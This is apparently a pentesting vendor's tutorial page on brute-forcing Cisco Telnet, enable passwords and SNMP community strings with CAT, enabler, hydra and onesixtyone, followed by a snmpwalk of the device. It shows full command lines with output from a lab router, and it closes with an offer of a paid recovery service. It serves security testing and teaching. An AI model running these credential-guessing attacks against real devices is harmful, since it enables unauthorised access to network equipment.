Logo


1. External Penetration Testing
  1. Penetration Testing of Windows

  2. Self-testing Security

  3. Laptop Hacking

2. Enterprise Penetration Testing
  1. Penetration Testing of your VPN

  2. Domain Controller Penetration Testing

  3. Tools; Metasploit

  4. Choosing a penetration Testing Supplier

3. CISCO Penetration Testing
  1. CISCO Penetration Testing

  2. Scan & Fingerprint

  3. Credentials Guessing

  4. Connect

  5. Vulnerability Assessment

  6. Further your attack

  7. CISCO Command Refference

CISCO Penetration Testing - Password Guessing/SNMP Attacks

  • CAT (Cisco Auditing Tool)
  • This tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

    ./CAT -h <IP> -a password.wordlist

    BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a /tmp/dict.txt
    Cisco Auditing Tool - g0ne [null0]
    Checking Host: 10.1.1.175

    Guessing passwords:
    Invalid Password: 1234
    Invalid Password: 2read
    Invalid Password: 4changes
    Password Found: telnet
    Invalid Password: CISCO
    Invalid Password: IBM

  • Brute-enabler
  • Brute-enabler is an internal enable password guesser. You require valid non-privilege mode credentials to use this tool, they can be either SSH or Telnet.

    ./enabler <IP> [-u username] -p password /password.wordlist [port]

    BT brute-enable-v.1.0.2 # ./enabler 10.1.1.175 telnet /tmp/dict.txt

    [`] enabler.
    [`] cisco internal bruteforcer. concept by anyone
    [`] coded by norby
    [`]
    [`] only password needed. sending [telnet]
    [`] seems we are logged in :)
    [`] telnet... wrong password
    [`] CISCO... wrong password
    [`] IBM... wrong password
    [`] OrigEquipMfr... wrong password
    [`] Cisco... wrong password
    [`] agent... wrong password
    [`] all... wrong password
    [`] possible password found: cisco

  • hydra
  • Hydra is a multi-functional password guessing tool. It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet which may only require a password.

    Make sure that you limit the threads to 4 (-t 4) as it will just overload the Telnet server!

    BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
    Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10
    [DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59), ~14 tries per task
    [DATA] attacking service cisco on port 23
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21673 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21670 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21673 was disconnected - exiting
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21672 terminating, can not connect
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21707 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    [STATUS] attack finished for 10.1.1.175 (waiting for childs to finish)
    [23][cisco] host: 10.1.1.175 login: password: telnet
    Hydra (http://www.thc.org) finished at 2007-02-26 10:54:23

SNMP Attacks
  • CAT (Cisco Auditing Tool)
  • This tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

    ./CAT -h <IP> -w SNMP.wordlist

    BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -w /tmp/snmp.txt
    Cisco Auditing Tool - g0ne [null0]

    Checking Host: 10.1.1.175
    Guessing passwords:
    Invalid Password: cisco
    Invalid Password: ciscos
    Invalid Password: cisco1

    Guessing Community Names:
    Invalid Community Name: CISCO
    Invalid Community Name: IBM
    Invalid Community Name: OrigEquipMfr
    Community Name Found: Cisco
    Invalid Community Name: SNMP

  • Onesixtyone
  • onesixtyone is a reliable SNMP community string guesser. Once it identifies the correct community string, it will display accurate fingerprinting information.

    onesixytone -c SNMP.wordlist <IP>

    BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
    Scanning 1 hosts, 64 communities
    10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
    10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

  • snmpwalk
  • snmpwalk is part of the SNMP toolkit. After a valid community string is identified, you should use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information. Ensure that you get the correct version of SNMP protocol in use or it will not work correctly. It may be a good idea to redirect the output to a text file for easier viewing as the tool outputs a large amount of text.

    snmapwalk -v <Version> -c <Community string> <IP>

    BT# snmpwalk -v 1 -c enable 10.1.1.1
    SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software
    IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2005 by cisco Systems, Inc.
    Compiled Fri 12-Aug
    SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185
    DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99
    SNMPv2-MIB::sysContact.0 = STRING:
    SNMPv2-MIB::sysName.0 = STRING: router
    SNMPv2-MIB::sysLocation.0 = STRING:
    SNMPv2-MIB::sysServices.0 = INTEGER: 78
    SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00
    IF-MIB::ifNumber.0 = INTEGER: 4

To receive your CISCO Password Recovery Service , please submit your payment of $1999.00 If more than 100 miles of travel will be required, the additional cost will be billed separatelly.


Business Name:
Contact Information:
Email Address:
URL or IP address:
  

Other members of our business group:
Cloud-Security.us

COPYRIGHT (C) 2000 - 2011 InfoSecPro.com ALL RIGHTS RESERVED